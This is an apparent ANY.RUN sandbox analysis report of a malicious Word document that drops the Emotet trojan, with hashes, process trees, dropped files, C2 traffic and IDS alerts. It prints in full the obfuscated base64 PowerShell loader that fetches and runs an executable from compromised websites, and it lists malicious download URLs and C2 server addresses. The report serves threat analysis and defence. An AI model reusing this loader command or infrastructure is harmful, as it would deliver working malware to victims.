analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

2019-04

Full analysis: https://app.any.run/tasks/fdb5f589-bdc3-4ba0-a982-3e31a3f9a17b
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: April 23, 2019, 11:34:42
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet
trojan
feodo
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Apr 23 07:36:00 2019, Last Saved Time/Date: Tue Apr 23 07:36:00 2019, Number of Pages: 1, Number of Words: 2, Number of Characters: 12, Security: 0
MD5:

487F8AB5660752F98425DAE16A3B0D74

SHA1:

A3D796F23CF2779AE70BB4B926B479BD56F2853A

SHA256:

038B79A29410A9DED140DDAAB017EA772EAA3D791F24BDCEF637A85C8E1B1C28

SSDEEP:

3072:i4eOY5CTsdApN2mF/qn6wq0dFiynHFCAGh10ow7n0Z44Iv:iTbiVqn6hwTl320ow70Z44W

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 769.exe (PID: 684)
      • soundser.exe (PID: 808)
      • 769.exe (PID: 4064)
      • soundser.exe (PID: 3604)
      • QOrWlG.exe (PID: 1128)
      • QOrWlG.exe (PID: 3032)
      • soundser.exe (PID: 908)
      • soundser.exe (PID: 3592)
      • soundser.exe (PID: 2788)
      • soundser.exe (PID: 3716)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 408)
    • Emotet process was detected

      • soundser.exe (PID: 808)
      • soundser.exe (PID: 2788)
      • soundser.exe (PID: 908)
    • Connects to CnC server

      • soundser.exe (PID: 3604)
      • soundser.exe (PID: 3592)
    • EMOTET was detected

      • soundser.exe (PID: 3604)
      • soundser.exe (PID: 3592)
    • Changes the autorun value in the registry

      • soundser.exe (PID: 3604)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 408)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 408)
      • 769.exe (PID: 4064)
      • soundser.exe (PID: 3604)
      • QOrWlG.exe (PID: 1128)
    • Application launched itself

      • 769.exe (PID: 684)
      • QOrWlG.exe (PID: 3032)
      • soundser.exe (PID: 908)
      • soundser.exe (PID: 2788)
    • Starts itself from another location

      • 769.exe (PID: 4064)
      • QOrWlG.exe (PID: 1128)
    • Connects to server without host name

      • soundser.exe (PID: 3604)
      • soundser.exe (PID: 3592)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3868)
      • iexplore.exe (PID: 944)
      • iexplore.exe (PID: 892)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3868)
    • Changes internet zones settings

      • iexplore.exe (PID: 892)
      • iexplore.exe (PID: 2308)
    • Reads internet explorer settings

      • iexplore.exe (PID: 944)
      • iexplore.exe (PID: 2836)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 892)
      • iexplore.exe (PID: 944)
      • iexplore.exe (PID: 2836)
    • Reads settings of System Certificates

      • iexplore.exe (PID: 892)
    • Adds / modifies Windows certificates

      • iexplore.exe (PID: 892)
    • Changes settings of System certificates

      • iexplore.exe (PID: 892)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:04:23 06:36:00
ModifyDate: 2019:04:23 06:36:00
Pages: 1
Words: 2
Characters: 12
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 13
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
58
Monitored processes
18
Malicious processes
10
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start drop and start winword.exe no specs powershell.exe 769.exe no specs 769.exe #EMOTET soundser.exe no specs #EMOTET soundser.exe iexplore.exe iexplore.exe iexplore.exe iexplore.exe no specs qorwlg.exe no specs qorwlg.exe #EMOTET soundser.exe no specs #EMOTET soundser.exe explorer.exe no specs #EMOTET soundser.exe no specs soundser.exe no specs taskmgr.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3868"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2019-04.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
408powershell -e JABjAEEAQQBRAEMARwBrAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBjACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBBAF8AQQAnACwAJwB1AEEAQgAnACkALAAnAG8AJwApACkAOwAkAGMAQQBBAEEAYwBfACAAPQAgACcANwA2ADkAJwA7ACQAegBCAEIAQQBBAEIAPQAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEMAJwAsACcAYwBEAEEAJwApACwAJwBHAEEAMQAnACwAJwBiACcAKQA7ACQAVgBjAEEAXwBaAFEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGMAQQBBAEEAYwBfACsAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwAuAGUAeAAnACwAJwBlACcAKQA7ACQAUQBRAG8AQQBRADQAUQBvAD0AKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBBAEQAQQAnACwAJwBYAFEAawAnACkAOwAkAEsAVQBBAFEAQgBRAEEAawA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwAnACsAJwBiAGoAZQBjAHQAJwApACAAbgBFAGAAVABgAC4AVwBFAGAAQgBgAGMATABpAGUATgB0ADsAJABRAEEARwBEAEIAQgA9ACgAIgB7ADcAfQB7ADMAMAB9AHsAOAB9AHsAMgB9AHsAMQA0AH0AewAyADEAfQB7ADQAfQB7ADIAOQB9AHsAMQA2AH0AewAxADkAfQB7ADIANwB9AHsAMgA0AH0AewAyADIAfQB7ADIAMAB9AHsAMgAzAH0AewAwAH0AewA2AH0AewAyADgAfQB7ADIANQB9AHsAMQB9AHsAOQB9AHsAMQA1AH0AewAxADIAfQB7ADEAOAB9AHsAMQAxAH0AewAxADAAfQB7ADEANwB9AHsAMgA2AH0AewAzAH0AewAxADMAfQB7ADUAfQAiACAALQBmACAAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAaQBlACcALAAnAGEAdAAnACkALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHgAbwBmACcALAAnAHIAJwApACwAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACcALwB3AHAAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbwBtACcALAAnAC4AYwAnACkALAAnAGkAbgAnACkALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAG4AJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcAbwBuACcALAAnAHQAZQAnACkAKQAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcALQBhAGQAJwAsACcAbQAnACkALAAnAGkAbgAnACkALAAnAFYALwAnACwAJwBuAHQALgAnACwAJwBoAHQAJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAbgAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAeQBkACcALAAnAGEAYQAnACkAKQAsACcAZAAvACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwAuACcALAAnAGcAcgBvACcAKQAsACcAdwAnACwAJwBoACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAHQALwBZACcALAAnADYAJwApACwAKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIALQBmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAC0AYQBkACcALAAnAG0AaQAnACkALAAnAC8AbQAnACwAJwBuACcAKQAsACgAIgB7ADMAfQB7ADEAfQB7ADIAfQB7ADAAfQAiACAALQBmACAAKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIAIAAtAGYAJwB3AHcAdwAnACwAJwAvAC8AJwAsACcALgB0ACcAKQAsACcAOAAwAC8AJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHQAdABwAHMAOgAnACwAJwBAAGgAJwApACwAJwA4ACcAKQAsACcAegAvACcALAAnAHUAJwAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAYgBlAHIAbQAnACwAJwBlACcAKQAsACcAYQAnACwAJwBhAG4AbAAnACkALAAoACIAewAxAH0AewAyAH0AewAwAH0AIgAgAC0AZgAgACcAcAA6ACcALAAnAEAAaAAnACwAJwB0AHQAJwApACwAKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIALQBmACAAJwB0ACcALAAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAIAAnAC8AaAAnACwAJwBwADoALwAnACwAJwBhACcAKQAsACcAdAAnACkALAAoACIAewA2AH0AewAwAH0AewA0AH0AewA1AH0AewAyAH0AewAzAH0AewAxAH0AIgAtAGYAIAAnAHAAJwAsACcALwB3AHAAJwAsACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBmACcAbgAnACwAJwBvAHYAJwAsACcAYQAnACwAJwBrAGkAdABvAHMAJwApACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcALgBjACcALAAnAG8AbQAnACkALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwA6AC8ALwAnACwAJwBhACcAKQAsACcAbABvACcALAAoACIAewAyAH0AewAwAH0AewAxAH0AIgAgAC0AZgAgACcAQABoACcALAAnAHQAdAAnACwAJwAyADcAcABxAC8AJwApACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBoAC8AJwAsACcAYQBVACcAKQAsACcAQABoACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBmACcAYgBlACcALAAnAHkAdABvACcALAAnAHAAJwApACwAJwBwAHAAJwApACwAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAGkAbgAvAGMAJwAsACcALQBiACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAG0ALwBjACcALAAnAGcAaQAnACkALAAnAG8AJwApACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAOAAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAG0ALwBvACcALAAnAG8AJwApACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAcAAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBjACcALAAnAC8AdwBwAC0AJwApACkALAAoACIAewAwAH0AewAxAH0AewA0AH0AewAzAH0AewAyAH0AIgAgAC0AZgAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAC8ALwAnACwAJwA5ADEAJwApACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBhAHAAaAAnACwAJwAyAGcAcgAnACkALAAnAGMAJwAsACcAYwBzAC4AJwAsACcAaQAnACkALAAnAGMAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbABDACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnADcAJwAsACcALwBSADEAJwApACkALAAoACIAewAwAH0AewAyAH0AewAxAH0AIgAtAGYAIAAnAHQAcAA6ACcALAAnAGEAcgBlACcALAAnAC8ALwAnACkAKQAuACIAcwBgAHAATABJAHQAIgAoACcAQAAnACkAOwAkAFoAQQBBAFUARABBAEQAQQA9ACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBmACAAJwBfACcALAAnAHMAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAEEAJwAsACcAVQBBAEEAJwApACwAJwB4AG8AJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABmAFUAQQBVAG8AYwBjAEcAIABpAG4AIAAkAFEAQQBHAEQAQgBCACkAewB0AHIAeQB7ACQASwBVAEEAUQBCAFEAQQBrAC4AIgBEAG8AVwBOAGAAbABvAGAAQQBkAEYASQBgAEwARQAiACgAJABmAFUAQQBVAG8AYwBjAEcALAAgACQAVgBjAEEAXwBaAFEAKQA7ACQAUQBDAFUAUQBrAHcAQgA9ACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiACAALQBmACAAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAdwA0ACcALAAnAEEAXwAnACkALAAnAEEAJwApACwAJwBiAFEAJwAsACcAQgAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQAVgBjAEEAXwBaAFEAKQAuACIATABlAG4ARwBgAFQASAAiACAALQBnAGUAIAAzADgANwAzADUAKQAgAHsALgAoACcASQBuAHYAJwArACcAbwBrAGUAJwArACcALQBJAHQAJwArACcAZQBtACcAKQAgACQAVgBjAEEAXwBaAFEAOwAkAEUAQQBBAEIAeAB4AEEAPQAoACIAewAwAH0AewAyAH0AewAxAH0AIgAtAGYAIAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBBAEIAJwAsACcAVQB4AEQAJwApACwAJwBpACcAKQAsACcAbwAnACwAJwBRACcAKQA7AGIAcgBlAGEAawA7ACQARwBVAFgAWgBBAEEAPQAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAgACcATwAnACwAJwBaAFEAQQAnACwAJwBBAEEARwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGEAQQBBAGsAWABVAD0AKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBvAEcAJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAQQBRACcALAAnAEQAQQAnACkAKQA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
684"C:\Users\admin\769.exe" C:\Users\admin\769.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
4064--6cf013b8C:\Users\admin\769.exe
769.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
808"C:\Users\admin\AppData\Local\soundser\soundser.exe"C:\Users\admin\AppData\Local\soundser\soundser.exe
769.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3604--3ab57678C:\Users\admin\AppData\Local\soundser\soundser.exe
soundser.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
892"C:\Program Files\Internet Explorer\iexplore.exe" C:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
944"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:892 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2308"C:\Program Files\Internet Explorer\iexplore.exe" C:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2836"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2308 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exeiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Total events
2 734
Read events
2 090
Write events
0
Delete events
0

Modification events

No data
Executable files
4
Suspicious files
6
Text files
19
Unknown types
11

Dropped files

PID
Process
Filename
Type
3868WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR2F5A.tmp.cvr
MD5:
SHA256:
408powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X1ZH7T6XDVISS5RH2EGU.temp
MD5:
SHA256:
892iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\favicon[1].ico
MD5:
SHA256:
892iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
944iexplore.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\admin@google[1].txt
MD5:
SHA256:
3868WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:9AA328F831C50DD9BBEFE2D9BC2194AD
SHA256:965B6A8A909D7CFA9EB1790958BDCACB88B5258F8EB535D32891D882224E44E2
408powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
944iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BYAP8SRR\google_ch[1].txt
MD5:
SHA256:
3868WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:5EAC6FF3F5E72A1B3DC77B9FF4E9DB54
SHA256:018C42EB3C3432EB9F4A1764FF35A96428F86518EED5B961A1B9CD1EAC4AE1C0
408powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF11399b.TMPbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
15
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3604
soundser.exe
POST
77.82.85.35:8080
http://77.82.85.35:8080/cookies/
RU
malicious
3604
soundser.exe
POST
152.168.82.167:80
http://152.168.82.167/entries/walk/
AR
malicious
408
powershell.exe
GET
200
31.169.92.34:80
http://arenaaydin.com/wp-admin/m27pq/
TR
executable
77.5 Kb
malicious
3592
soundser.exe
POST
152.168.82.167:80
http://152.168.82.167/cab/cab/
AR
malicious
892
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
2308
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
3592
soundser.exe
POST
197.91.152.93:80
http://197.91.152.93/taskbar/scripts/
ZA
malicious
944
iexplore.exe
GET
302
172.217.18.99:80
http://www.google.ch/
US
html
230 b
whitelisted
3604
soundser.exe
POST
200
66.228.45.129:8080
http://66.228.45.129:8080/report/
US
binary
116 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
892
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
408
powershell.exe
31.169.92.34:80
arenaaydin.com
Netfactor Telekominikasyon Ve Teknoloji Hizmetleri Sanayi Ve Jsc
TR
malicious
944
iexplore.exe
172.217.18.99:80
www.google.ch
Google Inc.
US
whitelisted
3604
soundser.exe
152.168.82.167:80
CABLEVISION S.A.
AR
malicious
3604
soundser.exe
197.91.152.93:80
OPTINET
ZA
malicious
944
iexplore.exe
172.217.18.99:443
www.google.ch
Google Inc.
US
whitelisted
892
iexplore.exe
172.217.18.99:443
www.google.ch
Google Inc.
US
whitelisted
3592
soundser.exe
197.91.152.93:80
OPTINET
ZA
malicious
3604
soundser.exe
66.228.45.129:8080
Linode, LLC
US
malicious
2308
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted

DNS requests

Domain
IP
Reputation
arenaaydin.com
  • 31.169.92.34
malicious
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
www.google.ch
  • 172.217.18.99
whitelisted

Threats

PID
Process
Class
Message
408
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
408
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
408
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3604
soundser.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 3
3604
soundser.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3604
soundser.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 14
3604
soundser.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 22
3604
soundser.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3604
soundser.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 21
3604
soundser.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
11 ETPRO signatures available at the full report
No debug info